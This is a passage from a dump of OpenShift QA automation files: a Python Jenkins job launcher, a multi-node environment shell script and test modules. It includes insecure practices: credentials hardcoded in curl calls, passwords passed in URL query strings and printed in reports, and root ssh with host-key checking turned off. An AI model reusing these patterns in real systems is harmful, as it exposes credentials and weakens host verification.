1879, "license_type": "no_license", "max_line_length": 100, "num_lines": 56, "path": "/automation/open/testmodules/RT/quick_start/quick_start_diy_java_demo.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport common\nimport rhtest\n# user defined packages\nfrom quick_start_test import QuickStartTest\n\n\nclass QuickStartDiyJavaDemo(QuickStartTest):\n    \n    def __init__(self, config):\n        rhtest.Test.__init__(self, config)\n        self.config.application_type = common.app_types[\"diy\"]\n        self.config.application_embedded_cartridges = [ ]\n        self.config.summary = \"[Runtime][rhc-cartridge]quick-start example: Openshift-diy-java-demo\"\n        self.config.git_upstream_url = 
\"git://github.com/openshift/openshift-diy-java-demo.git\"\n self.config.random_string = common.getRandomString()\n self.config.page = \"test.html\"\n self.config.page_pattern = self.config.random_string\n \n def post_configuration_steps(self):\n self.log_info(\"Steps after configuration\")\n print \"Creating test.html file\"\n test_html = open(\"%s/html/test.html\" % self.config.application_name, \"w\")\n test_html.write(\"<html>\\n\")\n test_html.write(\"<head><title>Testing</title></header>\\n\")\n test_html.write(\"<body><p>%s</p></body\\n>\" % self.config.random_string)\n test_html.write(\"</html>\\n\")\n test_html.close()\n \n def pre_deployment_steps(self):\n self.log_info(\"Step before deploying\")\n steps = [\n \"cd %s\" % self.config.application_name,\n \"git add .\",\n \"git commit -a -m testing\" \n ]\n ret_code = common.command_get_status(\" && \".join(steps))\n \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(QuickStartDiyJavaDemo)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5440176725387573, "alphanum_fraction": 0.5499051809310913, "avg_line_length": 47.5758171081543, "blob_id": "393ed7e263f8640315d7a2584d5fe14448325fab", "content_id": "b8eeb5d6ca57434b298cb385af87d1b6ddec83d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 25308, "license_type": "no_license", "max_line_length": 319, "num_lines": 521, "path": "/automation/open/bin/pretestingjob.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os\nimport sys\nimport commands\nimport re\nimport time\nimport yaml\nimport random\nimport string\nimport fcntl\nimport pymongo\nfrom urllib import quote, unquote\nfrom pymongo.errors import *\nfrom bson.objectid import ObjectId\n\nSCRIPT_PATH = os.path.abspath(os.path.dirname(__file__))\n\nclass DotDict(object):\n\n def __getattr__(self, name):\n return self.data[name]\n\n def __setattr__(self, name, value):\n if not self.__dict__.has_key('data'):\n self.__dict__['data'] = {}\n self.__dict__['data'][name] = value\n\n\nclass DefaultValueDict(dict):\n DEFAULT = {'instance_count' : 1, 'job_count' : 2}\n\n def __getitem__(self, key):\n if not self.has_key(key):\n return DefaultValueDict.DEFAULT\n else:\n return super(DefaultValueDict, self).__getitem__(key)\n\nclass PreTestingJob(object):\n KEY_PATH = os.path.join(SCRIPT_PATH, '..', 'etc', 'libra.pem')\n IP_ADDR = '184.73.182.48'\n FILE_PATH = '/var/lib/jenkins/fork_ami_qe_test_queue'\n TESTPLAN_ID = '4962'\n PLAN = DefaultValueDict({ 'fullfunction' : {'instance_count' : 2, 'job_count' : 6},\n 'stage' : {'instance_count' : 2, 'job_count' : 6},\n 'acceptance' : {'instance_count' : 2, 'job_count' : 4},\n 'smoke' : {'instance_count' : 1, 'job_count' : 2},\n })\n\n def __init__(self):\n # Change key file permission\n os.system(\"chmod 600 %s\" % (PreTestingJob.KEY_PATH))\n # Setup environment variables\n os.environ['RHTEST_HOME'] = os.path.abspath(os.curdir)\n os.environ['PATH'] = os.path.expandvars(os.path.expanduser('${RHTEST_HOME}/bin:${RHTEST_HOME}/lib:${RHTEST_HOME}/lib/supports:${RHTEST_HOME}/testmodules:$PATH'))\n os.environ['PYTHONPATH'] = os.path.expandvars(os.path.expanduser('${RHTEST_HOME}/bin:${RHTEST_HOME}/lib:${RHTEST_HOME}/lib/supports:${RHTEST_HOME}/testmodules:$PYTHONPATH'))\n # Init kerberos\n if not self.init_kerberos():\n print 'Failed to init kerberos. 
Please check your TCMS_USER and TCMS_PASSWORD'\n sys.exit(255)\n # Init parameters\n self.init_params()\n if not self.preprocess():\n sys.exit(255)\n # Connect to mongodb\n mongo_url = os.environ['MONGO_CONN_URL']\n try:\n self.conn = pymongo.Connection('mongodb://%s' % (mongo_url))\n except ConnectionFailure:\n print 'Error: Failed to connect to MongoDB at %s. Please check your system configurations.' % (mongo_url)\n sys.exit(255)\n self.db = self.conn['devenv']\n\n def __del__(self):\n # Disconnect from MongoDB\n if hasattr(self, 'conn'):\n self.conn.close()\n\n def get_instance_tag(self, ami_id):\n return 'QE_auto_%s' % (ami_id)\n\n def get_testrun_tag(self, testcase_tags, ami_id=None):\n result = 'Test Run for %s Testing' % (testcase_tags)\n if ami_id == None:\n return result\n else:\n return ' - '.join([result, ami_id])\n\n def get_ami_tags(self): # get ami_id and testcase_tags from remote machine for fork ami testing\n # Get lock\n try:\n f = file(\".trigger.lock\", \"w\")\n fcntl.flock(f, fcntl.LOCK_EX)\n except IOError, e:\n fcntl.flock(f, fcntl.LOCK_UN)\n print \"Failed to create lock file\\n\", e\n return None\n except ValueError, e:\n print 'Failed to get lock\\n', e\n f.close()\n return None\n # Get the first line\n cmd = 'ssh -t -t -q -i %s -o StrictHostKeyChecking=no -o ConnectTimeout=20 root@%s \\\"head -n 1 %s\\\"' % ( PreTestingJob.KEY_PATH,\n PreTestingJob.IP_ADDR,\n PreTestingJob.FILE_PATH)\n (ret, output) = commands.getstatusoutput(cmd)\n if ret != 0:\n print 'Failed to get the first line of %s on %s' % (PreTestingJob.FILE_PATH, PreTestingJob.IP_ADDR)\n fcntl.flock(f, fcntl.LOCK_UN)\n f.close()\n return None\n try:\n print \"The first line of remote file:\\n%s\\n\" % (output)\n # Get ami id and test tags\n output = output.strip().replace(' ','')\n match = re.search(r'([\\w\\-_]+)=(\\w+[\\w,]*)', output, re.M)\n ami_id = match.group(1)\n testcase_tags = match.group(2)\n print '\\nFound ami id and test case tags in remote file'\n print 'ami id: %s, test case tags: %s\\n' % (ami_id, testcase_tags)\n except AttributeError, e:\n print \"No fork ami found in remote file. The job will quit.\"\n sys.exit(0)\n finally:\n # Remove the first line\n cmd = \"ssh -t -t -q -i %s -o StrictHostKeyChecking=no -o ConnectTimeout=20 root@%s \\\"sed -i -e '1 d' %s\\\"\" % ( PreTestingJob.KEY_PATH,\n PreTestingJob.IP_ADDR,\n PreTestingJob.FILE_PATH)\n (ret, output) = commands.getstatusoutput(cmd)\n if ret != 0:\n print 'Warning!!! 
Failed to delete the first line of %s on %s' % (PreTestingJob.FILE_PATH, PreTestingJob.IP_ADDR)\n # Release lock\n fcntl.flock(f, fcntl.LOCK_UN)\n f.close()\n return (ami_id, testcase_tags)\n\n def get_build_uuid(self, length = 32):\n random.seed()\n return random.choice(string.ascii_lowercase) + ''.join(random.choice(string.ascii_lowercase + string.digits) for x in range(0, length-1))\n\n def get_instance_count(self, testcase_tags):\n for testcase_tag in ['fullfunction', 'stage', 'acceptance', 'smoke']:\n if testcase_tag in testcase_tags:\n return PreTestingJob.PLAN[testcase_tag]['instance_count']\n return DefaultValueDict.DEFAULT['instance_count']\n\n def get_job_count(self, testcase_tags):\n for testcase_tag in ['fullfunction', 'stage', 'acceptance', 'smoke']:\n if testcase_tag in testcase_tags:\n return PreTestingJob.PLAN[testcase_tag]['job_count']\n return DefaultValueDict.DEFAULT['job_count']\n\n def user_email_generator(self, prototype):\n if '@' in prototype:\n parts = prototype.split('@')\n else:\n parts = [prototype, 'redhat.com']\n i = 1\n while True:\n first_part = ''.join([parts[0], '+%d' % (i)])\n yield '@'.join([first_part, parts[1]])\n i += 1\n\n def get_users(self, count=None):\n result = {}\n if self.config.openshift_users != None:\n for pair in self.config.openshift_users.splitlines():\n try:\n [email, passwd] = pair.split(':')\n except ValueError:\n print 'Invalid OPENSHIFT_USERS'\n return None\n result[email] = passwd\n elif self.config.openshift_user_prototype != None:\n if count == None:\n return None\n try:\n [email, passwd] = self.config.openshift_user_prototype.split(':')\n except ValueError:\n print 'Invalid OPENSHIFT_USER_PROTOTYPE'\n return None\n iuser = self.user_email_generator(email)\n for i in range(count):\n result[iuser.next()] = passwd\n else:\n return None\n return result\n\n def init_kerberos(self):\n cmd = 'cd bin/ && ./kinit.sh'\n if os.system(cmd) != 0:\n return False\n return True\n\n def init_params(self):\n self.config = DotDict()\n self.param_list = ['INSTANCES', 'INSTANCE_TAG', 'AMI_ID', 'TESTRUN_ID', 'TESTRUN_TAG', 'TESTCASE_TAGS', 'SUB_JOB_NAME', 'INSTANCE_COUNT', 'JOB_COUNT', 'OPENSHIFT_USER_PROTOTYPE', 'OPENSHIFT_USERS', 'SHUTDOWN_INSTANCE', 'RESET_TESTRUN', 'UPDATE_CLIENT', 'RHC_VERSION', 'RHC_BRANCH', 'TCMS_USER', 'TCMS_PASSWORD']\n for param in self.param_list:\n setattr(self.config, param.lower(), os.environ.get(param))\n\n def strip_params(self):\n # Remove spaces from parameters\n for param in self.param_list:\n value = getattr(self.config, param.lower())\n if value != None:\n if param in ['INSTANCES', 'TESTCASE_TAGS', 'OPENSHIFT_USERS']:\n value = value.replace(' ', '')\n else:\n value = value.strip()\n if value != '':\n if param in ['INSTANCE_COUNT', 'JOB_COUNT']:\n try:\n setattr(self.config, param.lower(), int(value))\n except ValueError:\n print 'Invalid parameter: INSTANCE_COUNT or JOB_COUNT. 
They must be numbers'\n return False\n else:\n setattr(self.config, param.lower(), value)\n else:\n setattr(self.config, param.lower(), None)\n return True\n\n def preprocess(self):\n if not self.strip_params():\n return False\n if self.config.tcms_user == None or self.config.tcms_password == None:\n print 'TCMS_USER and TCMS_PASSWORD are needed'\n return False\n if self.config.reset_testrun not in ['true', 'false']:\n print 'RESET_TESTRUN can only be one of \"true\" and \"false\"'\n return False\n if self.config.shutdown_instance not in ['true', 'false']:\n print 'SHUTDOWN_INSTANCE can only be one of \"true\" and \"false\"'\n return False\n # Check if it's possible to get/generate openshift users\n if self.config.openshift_users == None:\n if self.config.openshift_user_prototype == None:\n self.config.openshift_user_prototype = \"openshift\" + self.get_build_uuid(6) + \"@redhat.com:redhat\"\n print 'Generated random OPENSHIFT_USER_PROTOTYPE: %s' % (self.config.openshift_user_prototype)\n # fork ami test. Get ami_id and testcase_tags from remote\n if self.config.instances == None and self.config.ami_id == None and self.config.testrun_id == None and self.config.testcase_tags == None:\n try:\n (self.config.ami_id, self.config.testcase_tags) = self.get_ami_tags()\n except TypeError:\n print 'Error: Failed to get AMI_ID and TESTCASE_TAGS from remote.'\n sys.exit(0)\n # Check if it's possible to get/create test run with current parameters\n if self.config.testrun_id == None:\n if self.config.testcase_tags == None:\n print \"Please specify TESTCASE_TAGS or provide TESTRUN_ID\"\n return False\n # Check if it's possible to get/create instances with current parameters\n if self.config.instances == None:\n if self.config.ami_id == None:\n print 'Please specify AMI_ID or provide existing INSTANCES'\n return False\n # Check if it's possible to get/calculate instance count with current parameters\n if self.config.instances == None:\n if self.config.instance_count == None:\n if self.config.testcase_tags == None:\n print 'Error: Please provide INSTANCE_COUNT or TESTCASE_TAGS(INSTANCE_COUNT can be calculated using TESTCASE_TAGS)'\n return False\n else:\n self.config.instance_count = self.get_instance_count(self.config.testcase_tags)\n else:\n self.config.instance_count = len(self.config.instances.splitlines())\n # Check if it's possible to get/calculate job count with current parameters\n if self.config.openshift_users != None:\n self.config.job_count = len(self.config.openshift_users.splitlines())\n if self.config.job_count == None:\n if self.config.testcase_tags == None:\n print 'Error: Please provide JOB_COUNT or TESTCASE_TAGS(JOB_COUNT can be calculated using TESTCASE_TAGS)'\n return False\n else:\n self.config.job_count = self.get_job_count(self.config.testcase_tags)\n # Get user emails\n self.openshift_user_dict = self.get_users(self.config.job_count)\n if self.openshift_user_dict == None:\n print 'Failed to get user emails. 
Please check'\n return False\n # Check if INSTANCE_COUNT is less than/equal to JOB_COUNT\n if self.config.instance_count > self.config.job_count:\n print 'Error: INSTANCE_COUNT is larger than JOB_COUNT, which may cause waste of instances.'\n return False\n return True\n\n def create_testrun(self, testrun_tag, testcase_tags):\n cmd = \"python bin/create_test_run.py -t '%s' -g '%s'\" % (testrun_tag, testcase_tags)\n (ret, output) = commands.getstatusoutput(cmd)\n print output\n if ret == 0:\n match = re.search(r'(?<=test_run_id=)\\w+$', output, re.M)\n if match != None:\n return match.group(0)\n return None\n\n def reset_testrun(self, testrun_id, *states):\n cmd = 'python bin/reset_testrun.py %s %s' % (testrun_id, ' '.join(states))\n (ret, output) = commands.getstatusoutput(cmd)\n if ret != 0:\n print output\n return ret\n\n def trigger_job(self, **args):\n url = 'http://ciqe.englab.nay.redhat.com/job/%s/buildWithParameters?token=openshift&delay=0sec&%s' % (self.config.sub_job_name, '&'.join(['%s=%s' % (key,value) for (key,value) in args.items()]))\n cmd = \"curl -s -k --user 'test:redhat' '%s'\" % (url)\n (ret, output) = commands.getstatusoutput(cmd)\n if ret != 0:\n print output\n return ret\n\n def check_instance(self, ip, retry=2, timeout=20):\n cmd = \"ssh -t -t -i %s -o StrictHostKeyChecking=no -o ConnectTimeout=%d root@%s \\\"ls\\\"\" % (PreTestingJob.KEY_PATH, timeout, ip)\n for i in range(retry):\n (ret, output) = commands.getstatusoutput(cmd)\n if ret == 0:\n return True\n return False\n\n def check_existing_instances(self, retry=2, timeout=20):\n cursor = self.db.instances.find()\n for instance in cursor:\n print 'Checking instance: %s' % (instance['ip'])\n if instance['ip'] in (\"int.openshift.redhat.com\", \"stg.openshift.redhat.com\"):\n print 'No need to check stage or INT server'\n elif self.check_instance(instance['ip'], retry=2, timeout=20):\n print 'Instance %s is Active' % (instance['ip'])\n else:\n print 'Failed to ssh connect instance: %s. Remove it from MongoDB.' % (instance['ip'])\n try:\n self.db.instances.remove(instance['_id'], safe=True)\n except OperationFailure, e:\n print 'Warning: failed to remove inactive instance %s(%s) from MongoDB.\\n%s' % (instance['tag'], instance['ip'], e)\n\n def use_instance(self, build_uuid, tag, ip, value=1):\n cursor = self.db.instances.find({'tag':tag, 'ip':ip})\n if cursor.count() == 1:\n instance = cursor[0]\n if build_uuid in instance['users']:\n print 'instance %s(%s) is already being used by user: %s' % (tag, ip, build_uuid)\n return True\n self.db.instances.update({'_id':ObjectId(instance['_id'])}, {'$inc' : {'user_count' : value}})\n self.db.instances.update({'_id':ObjectId(instance['_id'])}, {'$push' : {'users' : build_uuid}})\n return True\n elif cursor.count() <= 0:\n print 'No such instance found: %s(%s)' % (tag, ip)\n return False\n else:\n print 'Multiple instances found: %s(%s). Please check.' 
% (tag, ip)\n return False\n\n def create_instance(self, tag, ami_id):\n cmd = \"python bin/create_instance.py -n '%s' -m '%s'\" % (tag, ami_id)\n (ret, output) = commands.getstatusoutput(cmd)\n if ret == 0:\n match = re.search(r'(?<=instance_ip=)[\\w.]+$', output, re.M)\n if match != None:\n ip = match.group(0)\n return ip\n else:\n print output\n return None\n\n def add_instance(self, tag, ip):\n cursor = self.db.instances.find({'tag':tag, 'ip':ip})\n if cursor.count() > 0:\n print 'Instance %s(%s) is already in MongoDB' % (tag, ip)\n return True\n try:\n self.db.instances.insert({'tag' : tag, 'ip' : ip, 'user_count' : 0, 'users' : []}, safe=True)\n except OperationFailure, e:\n print 'Error: Failed to add instance to mongodb\\n', e\n return False\n return True\n\n def start(self):\n # To run a test, we need a test run, several instances, and trigger sub jenkins job several times. There're 3 situations:\n # If instances aren't provides, we need to create new instances using AMI_ID and INSTANCE_TAG(optional).\n # If testrun_id isn't provided, we need to create a new test run using TESTCASE_TAGS and TESTRUN_TAG(optional).\n # If instances, testrun_id, ami_id, and testcase_tags are not provided, we need to get AMI_ID and TESTCASE_TAGS from remote.\n # Generate report\n self.report = {}\n self.report['6. Shutdown Instance'] = self.config.shutdown_instance\n self.report['2. TCMS User'] = self.config.tcms_user\n if self.config.testrun_id == None:\n # Get testrun_tag\n if self.config.testrun_tag == None:\n self.config.testrun_tag = self.get_testrun_tag(self.config.testcase_tags, self.config.ami_id)\n # Create test run using testcase_tags\n self.config.testrun_id = self.create_testrun(self.config.testrun_tag, self.config.testcase_tags)\n if self.config.testrun_id == None:\n print 'Error: Unable to create test run.'\n sys.exit(2)\n else:\n # If existing TESTRUN_ID is provided\n if self.config.reset_testrun == 'true':\n if self.reset_testrun(self.config.testrun_id, 'FAILED', 'ERROR', 'RUNNING') == 0:\n print 'Test run %s has been reset' % (self.config.testrun_id)\n else:\n print 'Failed to reset testrun: %s' % (self.config.testrun_id)\n sys.exit(3)\n # Add test run to report\n self.report['1. Test Run'] = 'https://tcms.engineering.redhat.com/run/%s/' % (self.config.testrun_id)\n # Add users to report\n self.report['3. OpenShift Users'] = []\n for user,passwd in self.openshift_user_dict.items():\n self.report['3. 
OpenShift Users'].append({'Login':user, 'Password':passwd})\n # Create instances or get existing instances\n instance_list = []\n if self.config.instances == None:\n # self.config.ami_id can't possibly be None because it should be either provided or gotten from remote.\n # Get instance_tag\n if self.config.instance_tag == None:\n self.config.instance_tag = self.get_instance_tag(self.config.ami_id)\n # Create instances using ami_id\n for i in range(self.config.instance_count):\n instance_tag = '%s_%s' % (self.config.instance_tag, self.get_build_uuid(6))\n ip = self.create_instance(instance_tag, self.config.ami_id)\n if ip == None:\n print 'Failed to create instance: %s(ami id: %s, ip: %s)' % (instance_tag, self.config.ami_id, ip)\n sys.exit(3)\n if not self.add_instance(instance_tag, ip):\n print 'Warning: Failed to add instance to MongoDB: %s(ami id: %s, ip: %s)' % (instance_tag, self.config.ami_id, ip)\n instance_list.append((instance_tag, ip))\n self.config.instances = \"\\n\".join([instance[1] for instance in instance_list])\n else:\n for (i,ip) in enumerate(self.config.instances.splitlines()):\n instance_list.append((ip, ip))\n if not self.add_instance(ip, ip):\n print 'Failed to add user provided instance(%s) to MongoDB' % (ip)\n sys.exit(4)\n # Add instance count and job count to report\n self.report['4. Instance Count'] = self.config.instance_count\n self.report['5. Jenkins Build Count'] = self.config.job_count\n self.report['7. Instances'] = []\n # Now we have a test run and several instances. Time to trigger sub jenkins jobs.\n jobs_per_instance = self.config.job_count / self.config.instance_count\n remainder = self.config.job_count % self.config.instance_count\n user_iter = self.openshift_user_dict.iteritems()\n for i in range(self.config.instance_count):\n tmp = jobs_per_instance\n if remainder > 0:\n tmp += 1\n remainder -= 1\n if instance_list[i][0] == instance_list[i][1]:\n print 'Instance: %s' % (instance_list[i][1])\n else:\n print 'Instance: %s(%s)' % (instance_list[i][0], instance_list[i][1])\n # Add instance to report\n if instance_list[i][0] == instance_list[i][1]:\n self.report['7. Instances'].append({'Builds Count':tmp, 'IP':instance_list[i][1], 'Jenkins Builds':[]})\n else:\n self.report['7. Instances'].append({'Builds Count':tmp, 'Name':instance_list[i][0], 'IP':instance_list[i][1], 'Jenkins Builds':[]})\n # Trigger jenkins builds\n for j in range(tmp):\n build_uuid = self.get_build_uuid()\n try:\n (user_email, user_passwd) = user_iter.next()\n except StopIteration:\n print 'Strange...accounts should not be less than jobs. 
Please debug'\n sys.exit(255)\n if self.config.rhc_version == None:\n self.config.rhc_version = ''\n ret = self.trigger_job( INSTANCE_TAG=quote(instance_list[i][0]),\n INSTANCE_IP=quote(instance_list[i][1]),\n TESTRUN_ID=quote(self.config.testrun_id),\n OPENSHIFT_user_email=quote(user_email),\n OPENSHIFT_user_passwd=quote(user_passwd),\n BUILD_UUID=quote(build_uuid),\n TESTPLAN_ID=quote(PreTestingJob.TESTPLAN_ID),\n SHUTDOWN_INSTANCE=quote(self.config.shutdown_instance),\n UPDATE_CLIENT=quote(self.config.update_client),\n RHC_VERSION=quote(self.config.rhc_version),\n RHC_BRANCH=quote(self.config.rhc_branch),\n TCMS_USER=quote(self.config.tcms_user),\n TCMS_PASSWORD=quote(self.config.tcms_password),\n MONGO_CONN_URL=quote(os.environ['MONGO_CONN_URL']))\n # Add time interval to avoid concurrence problems\n print \"Wait for 10 secs to avoid concurrence problems...\"\n time.sleep(10)\n if ret != 0:\n print 'Error: Failed to trigger sub jenkins jobs'\n sys.exit(6)\n if not self.use_instance(build_uuid, instance_list[i][0], instance_list[i][1]):\n print 'Error: Failed to add the user_count of instance %s(%s)' % (instance_list[i][0], instance_list[i][1])\n sys.exit(7)\n # Add jenkins build to report\n self.report['7. Instances'][i]['Jenkins Builds'].append({'Build UUID':build_uuid, 'OpenShift User':{'Login':user_email, 'Password':user_passwd}})\n print '\\n\\nReport:'\n print yaml.dump(self.report, indent=8)\n sys.exit(0)\n\n\nclass UnitTest(PreTestingJob):\n def __init__(self):\n super(UnitTest, self).__init__()\n\n def create_testrun(self, testrun_tag, testcase_tags):\n random.seed()\n return str(random.randint(0, 9999999))\n\n def create_instance(self, instance_tag, ami_id):\n if not ami_id or not instance_tag:\n print 'Failed to create instance'\n return None\n random.seed()\n return '.'.join([str(random.randint(1, 255)) for i in range(4)])\n\n def get_ami_tags(self):\n return ('devenv_2061', 'acceptance,smoke') \n\n def reset_testrun(self, testrun_id, *states):\n print 'Testrun: %s has been reset' % (testrun_id)\n return 0\n\n def trigger_job(self, **args):\n print 'trigger job'\n return 0\n\nif __name__ == '__main__':\n job = PreTestingJob()\n job.start()\n" }, { "alpha_fraction": 0.6207053661346436, "alphanum_fraction": 0.6402730345726013, "avg_line_length": 23.14285659790039, "blob_id": "031a607d040631b8892d062d377ec85b47d9fac3", "content_id": "24d9504c42fca88b1f0db756c1eb2d7abe99d292", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4395, "license_type": "no_license", "max_line_length": 223, "num_lines": 182, "path": "/automation/open/bin/setup_multi_node_env.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/bash\n#\n#\n# Generated from https://hosted.englab.nay.redhat.com/issues/11110\n#\n# [email protected]\n#\n\n#set -e\n\nfunction usage(){\n echo \"Usage: $0 <tag> [size=2] [node profiles list]\"\n}\n\nfunction set_profile(){\n node=$1\n profile=$2\n config_file=\"/etc/openshift/resource_limits.conf\"\n profile_file=\"${config_file}.${profile}\"\n ssh -i $HOME/.ssh/libra.pem root@$node <<EOF\n cd /etc/openshift\n rm -f $config_file \n ln -v -s $profile_file $config_file\n /usr/libexec/mcollective/update_yaml.rb /etc/mcollective/facts.yaml\nEOF\n}\n\nfunction add_node2district(){\n DISTRICT_NAME=$1\n NODE=$2\n ssh -i $HOME/.ssh/libra.pem root@verifier <<EOF\n rhc-admin-ctl-district -c add-node -n $DISTRICT_NAME -i $NODE\nEOF\n}\n\nfunction create_district(){\n DISTRICT_NAME=$1\n PROFILE=$2\n 
#(small(default)|jumbo|exlarge|large|medium|micro|c9) Only needed for create\n ssh -i $HOME/.ssh/libra.pem root@verifier <<EOF\n rhc-admin-ctl-district -c create -n $DISTRICT_NAME -p $PROFILE\nEOF\n}\n\nif [ -z \"$1\" ]; then\n usage;\n exit 2\nfi\n\nTAG=$1\nSIZE=$2\n: ${SIZE:=2}\nshift 2\nPROFILES=$*\n\nTMP=$(mktemp -d) \ncd $TMP\ngit clone [email protected]:openshift/li.git li\nif [ ! -f ./li/build/devenv ]; then\n echo \"Unable to locate LI repository\"\n exit 3;\nfi\n\n#clean .ssh/config from old verifier*\nsed -e \"/verifier/,+3d\" -i $HOME/.ssh/config\nsed -e \"/werifier/,+3d\" -i $HOME/.ssh/config\n\n#1. Prepare two devenv instances, assume their name is \"node1\" and \"node2\".\nfor i in `seq 1 $SIZE`; do\n echo \"Building node#$i\"\n ./li/build/devenv launch ${TAG}${i} --express_server --ssh_config_verifier \n IP=$(ssh verifier ip a ls dev eth0 | awk '/inet/{split($2,a,\"/\");print a[1]}') \n echo \"IP_$i: $IP\"\n sleep 3\n eval \"NODE${i}_IP=$IP\"\n sed -e \"s/verifier$/werifier$i/\" -i $HOME/.ssh/config\ndone\n\n\necho \"Setting BROKER_HOST on $NODE1_IP\"\nsed -e \"s/werifier1/verifier/\" -i $HOME/.ssh/config\nsed -e \"s/werifier/verifier/\" -i $HOME/.ssh/config\nssh root@verifier <<EOF\nsed -i -e \"s/BROKER_HOST=.*/BROKER_HOST=$NODE1_IP/\" /etc/openshift/openshift-node.conf\ncat /etc/openshift/openshift-node.conf | grep BROKER_HOST\nEOF\necho \"done.\"\n\nfor i in `seq 1 $SIZE`; do\n if [ \"$i\" == \"1\" ]; then \n echo \"Setup multi node broker...\"\n ./li/build/devenv setup_multi_node_broker --verbose\n else\n echo \"Adding node#$i ...\"\n ./li/build/devenv add_multi_node_devenv verifier$i --verbose\n fi\n \ndone\n\ni=\"\"\nfor profile in $PROFILES; do\n host=\"verifier$i\"\n echo \"Setting profile to $profile on $host ...\"\n set_profile $host $profile\n if [ \"$i\" == \"\" ]; then\n i=1\n fi\n #setup district per each node profile...\n DISTRICT_NAME=\"qa$profile\"\n echo \"Creating/Updating district: $DISTRICT_NAME\" #per each node profile...\n if [ \"$SIZE\" -gt 1 ]; then\n create_district $DISTRICT_NAME $profile || true #it might fail/ignore it\n eval \"ref=NODE${i}_IP\"\n eval \"IP=\\$$ref\"\n add_node2district $DISTRICT_NAME $IP\n fi\n i=$(( $i+1 ))\ndone\n\n#Cleaning up the LI repository\nrm -rf $TMP\n\necho \"\\nConfiguration:\"\nfor i in `seq 1 $SIZE`; do\n eval \"ref=NODE${i}_IP\"\n eval \"IP=\\$$ref\"\n echo -e \"\\tIP[$i]: $IP\"\ndone\n\nexit 0\n\n======================================AUTO======================================\n\n#1. Prepare two devenv instances, assume their name is \"node1\" and \"node2\".\n\n\nE.g:\n\nnode1's IP: 10.113.42.21 (QPID server, Broker Server and a common Node)\n\n\nnode2's IP: 10.2.187.186 (a common Node)\n\n\n#2. Add the following to ~/.ssh/config in your local machine\n\n\nHost verifier\n User root\n IdentityFile <path-to>/libra.pem\n HostName <node1.public.hostname>\n\n\nHost verifier2\n User root\n IdentityFile <path-to>/libra.pem\n HostName <node2.public.hostname>\n\n\n#3. Git clone li repo. Firstly you need access permission to li repo, if you have not, you can run the following command on a instance without any access permission, then cp all file to your local machine using scp command.\n\n\n$ git clone git://git1.ops.rhcloud.com/li.git\n\n\n#4. On node1, edit /etc/openshift/openshift-node.conf.\n\n# vi /etc/openshift/openshift-node.conf\n\nBROKER_HOST=10.113.42.21\n\n\n#5. Run the following command to setup broker node.\n\n$ cd <li.repo>/build\n\n$ ./devenv setup_multi_node_broker --verbose\n\n\n#6. 
Run the following command to add a common node.\n\n#$ ./devenv add_multi_node_devenv verifier2 --verbose\n\n" }, { "alpha_fraction": 0.6175979971885681, "alphanum_fraction": 0.6255212426185608, "avg_line_length": 30.14285659790039, "blob_id": "8b686a8f36d4289dc2de41381816333334f3fd97", "content_id": "c4788141404e59d7858e8c305b50c7cabee8033e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2398, "license_type": "no_license", "max_line_length": 160, "num_lines": 77, "path": "/automation/open/testmodules/RT/client/rhc_chk_sshkey.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.key_filename= common.getRandomString(10)\n self.new_keyname = common.getRandomString(10)\n self.app_name = common.getRandomString(10)\n try:\n self.app_type = self.config.test_variant\n except:\n self.app_type = 'php'\n tcms_testcase_id=129189\n common.env_setup()\n self.steps_list = []\n\n def finalize(self):\n try:\n os.system(\"rm -f %s*\"%self.key_filename)\n common.remove_sshkey(self.new_keyname, self.user_email, self.user_passwd)\n except:\n pass\n\n\nclass RhcChkSshkey(OpenShiftTest):\n def test_method(self):\n\n self.steps_list.append(testcase.TestCaseStep(\"Create a ssh key\",\n \"ssh-keygen -t dsa -f %s -N '' \" % self.key_filename,\n expect_return=0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Add this key to openshift\" ,\n common.add_sshkey,\n function_parameters=[\"%s.pub\" % (self.key_filename), self.new_keyname, self.user_email, self.user_passwd],\n expect_return=0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Check the rhc domain status if throws eception\" ,\n \"eval `ssh-agent`; ssh-add ~/.ssh/id_rsa; rhc domain status -l %s -p '%s' %s\"%(self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0))\n\n case = testcase.TestCase(\"[US1652][UI][CLI] Multi key management rhc domain status\",\n self.steps_list)\n\n case.run()\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RhcChkSshkey)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.7025572061538696, "alphanum_fraction": 0.7348586916923523, "avg_line_length": 25.535715103149414, "blob_id": "441d7e1d3e77591f38e0ca1f98b5da0f48f9addf", "content_id": "ef0d2c5eac47f85cdfdd8b8ea3f3e69bcf5a7459", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": 